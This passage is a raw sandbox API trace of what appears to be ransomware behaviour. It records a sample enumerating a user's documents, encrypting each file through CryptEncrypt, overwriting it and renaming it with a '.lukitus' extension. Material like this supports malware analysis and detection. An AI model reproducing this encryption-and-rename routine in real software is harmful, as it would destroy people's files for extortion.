lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd613, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd613, lpOverlapped=0x0) returned 1 [0106.856] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.856] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd613, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd613, lpOverlapped=0x0) returned 1 [0106.856] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63b83c10, dwHighDateTime=0x1d31760)) [0106.857] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.857] FlushFileBuffers (hFile=0x324) returned 1 [0106.860] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\sdjwh@dive.djh.pst" (normalized: "c:\\users\\aetadzjz\\documents\\outlook files\\sdjwh@dive.djh.pst"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c5f060, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x88c5f060, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x94845900, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.860] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\sdjwh@dive.djh.pst" (normalized: "c:\\users\\aetadzjz\\documents\\outlook files\\sdjwh@dive.djh.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.860] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\sdjwh@dive.djh.pst" (normalized: "c:\\users\\aetadzjz\\documents\\outlook files\\sdjwh@dive.djh.pst"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\F56924BE-9663-41BB-612962EE-CDA06FAA83D1.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\outlook files\\f56924be-9663-41bb-612962ee-cda06faa83d1.lukitus"), dwFlags=0x9) returned 1 [0106.862] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.862] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.867] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x42400, lpOverlapped=0x0) returned 1 [0106.878] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.878] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x42400, lpOverlapped=0x0) returned 1 [0106.879] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63ba9d70, dwHighDateTime=0x1d31760)) [0106.879] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.879] FlushFileBuffers (hFile=0x324) returned 1 [0106.886] SetFileAttributesW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\F56924BE-9663-41BB-612962EE-CDA06FAA83D1.lukitus", dwFileAttributes=0x80) returned 1 [0106.886] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\e3jdD AhhDmJ.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\e3jdd ahhdmj.ppt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3f3e70, ftCreationTime.dwHighDateTime=0x1d30019, ftLastAccessTime.dwLowDateTime=0x3bad3910, ftLastAccessTime.dwHighDateTime=0x1d30535, ftLastWriteTime.dwLowDateTime=0x3bad3910, ftLastWriteTime.dwHighDateTime=0x1d30535, nFileSizeHigh=0x0, nFileSizeLow=0x17f67)) returned 1 [0106.886] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.886] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.886] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.886] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.886] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.887] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\e3jdD AhhDmJ.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\e3jdd ahhdmj.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.887] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\e3jdD AhhDmJ.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\e3jdd ahhdmj.ppt"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-8C112ABD-8E26AA86B08A.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-8c112abd-8e26aa86b08a.lukitus"), dwFlags=0x9) returned 1 [0106.889] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.889] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.894] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17f67, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17f67, lpOverlapped=0x0) returned 1 [0106.895] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.895] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17f67, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17f67, lpOverlapped=0x0) returned 1 [0106.895] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63bcfed0, dwHighDateTime=0x1d31760)) [0106.895] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.896] FlushFileBuffers (hFile=0x324) returned 1 [0106.898] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\pHA-WtfIuB3x.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\pha-wtfiub3x.ppt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b762450, ftCreationTime.dwHighDateTime=0x1d302bb, ftLastAccessTime.dwLowDateTime=0x5c23ea40, ftLastAccessTime.dwHighDateTime=0x1d2f78e, ftLastWriteTime.dwLowDateTime=0x5c23ea40, ftLastWriteTime.dwHighDateTime=0x1d2f78e, nFileSizeHigh=0x0, nFileSizeLow=0x3332)) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.899] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\pHA-WtfIuB3x.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\pha-wtfiub3x.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.899] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\pHA-WtfIuB3x.ppt" (normalized: "c:\\users\\aetadzjz\\documents\\pha-wtfiub3x.ppt"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-02ED3F77-9C606D75C05C.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-02ed3f77-9c606d75c05c.lukitus"), dwFlags=0x9) returned 1 [0106.901] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.901] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.906] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3332, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3332, lpOverlapped=0x0) returned 1 [0106.906] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.906] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3332, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3332, lpOverlapped=0x0) returned 1 [0106.907] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63bf6030, dwHighDateTime=0x1d31760)) [0106.907] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.907] FlushFileBuffers (hFile=0x324) returned 1 [0106.910] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\VevSo7gmHU.ots" (normalized: "c:\\users\\aetadzjz\\desktop\\vevso7gmhu.ots"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8649180, ftCreationTime.dwHighDateTime=0x1d30546, ftLastAccessTime.dwLowDateTime=0xf1a7ff60, ftLastAccessTime.dwHighDateTime=0x1d302ed, ftLastWriteTime.dwLowDateTime=0xf1a7ff60, ftLastWriteTime.dwHighDateTime=0x1d302ed, nFileSizeHigh=0x0, nFileSizeLow=0x11f30)) returned 1 [0106.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.911] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\VevSo7gmHU.ots" (normalized: "c:\\users\\aetadzjz\\desktop\\vevso7gmhu.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.911] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\VevSo7gmHU.ots" (normalized: "c:\\users\\aetadzjz\\desktop\\vevso7gmhu.ots"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-781DE6A6-E5A7705BB692.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-781de6a6-e5a7705bb692.lukitus"), dwFlags=0x9) returned 1 [0106.914] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.914] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.920] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11f30, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11f30, lpOverlapped=0x0) returned 1 [0106.921] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.921] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11f30, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11f30, lpOverlapped=0x0) returned 1 [0106.921] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63c1c190, dwHighDateTime=0x1d31760)) [0106.922] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.922] FlushFileBuffers (hFile=0x324) returned 1 [0106.925] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\RaGQtsBU4.odt" (normalized: "c:\\users\\aetadzjz\\documents\\ragqtsbu4.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8387490, ftCreationTime.dwHighDateTime=0x1d2fc97, ftLastAccessTime.dwLowDateTime=0x1d938930, ftLastAccessTime.dwHighDateTime=0x1d2fbbb, ftLastWriteTime.dwLowDateTime=0x1d938930, ftLastWriteTime.dwHighDateTime=0x1d2fbbb, nFileSizeHigh=0x0, nFileSizeLow=0x11ab1)) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.925] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | 